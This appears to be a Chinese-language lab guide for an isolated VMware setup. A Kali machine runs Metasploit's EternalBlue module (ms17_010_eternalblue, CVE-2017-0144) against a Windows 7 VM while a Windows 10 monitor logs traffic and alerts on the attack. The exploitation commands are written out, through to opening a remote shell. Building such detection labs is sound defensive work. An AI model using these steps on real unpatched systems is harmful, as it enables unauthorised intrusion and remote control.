本次实验在 VMWare 中的 3 台虚拟机上完成:1 台攻击机(Kali Linux),1 台受害者机(Windows 7 - 64bit SP1),1 台监控机(Windows 10)。各机器使用相同的网卡(NAT),并确保它们可以互相 ping 通。一些注意事项:
sudo apt updateB0: 启动模型中的 3 台机器
B1: 在攻击机上:启动 Metasploit。可以在终端中使用命令 msfconsole 启动
B2: 继续使用 search eternalblue 查找合适的攻击模块。使用模块:use exploit/windows/smb/ms17_010_eternalblue
B3: 设置参数 set RHOST + 受害者机器 IP。
B4: 在监控机上:运行程序。程序运行时会记录网络流量到 .csv 文件,如果检测到攻击,则会在控制台显示警报并记录日志到 log.txt 文件
B5: 在攻击机上:开始发起攻击 exploit
B6: 监控机会显示检测到攻击的警报。Kali 机器将获得通往受害者机器的会话,可以使用 shell 命令打开受害者的 CMD。完成实验。
关于 CVE-2017-0144 的更多信息:
为受害者机器查找合适的操作系统版本: